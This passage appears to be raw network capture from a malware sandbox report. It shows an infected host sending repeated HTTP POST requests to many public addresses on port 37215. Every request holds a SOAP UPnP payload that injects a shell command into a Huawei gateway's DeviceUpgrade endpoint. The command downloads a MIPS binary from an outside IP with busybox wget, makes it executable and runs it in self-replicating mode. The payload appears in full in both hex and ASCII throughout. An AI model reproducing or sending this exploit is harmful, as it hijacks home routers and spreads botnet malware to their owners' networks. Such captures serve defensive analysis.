                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3190192.168.2.233905641.202.72.17937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660600901 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3191192.168.2.233282043.70.213.14337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660613060 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192192.168.2.2352480157.178.28.22937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660623074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3193192.168.2.2347190157.158.109.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660634041 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3194192.168.2.2337238197.66.236.24237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660686016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3195192.168.2.235803241.68.6.3937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.660693884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3196192.168.2.2359176197.107.9.9537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661171913 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3197192.168.2.2338722157.250.229.17937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661171913 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3198192.168.2.234423041.33.38.24737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661201000 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3199192.168.2.2355570197.53.34.16537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661206961 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
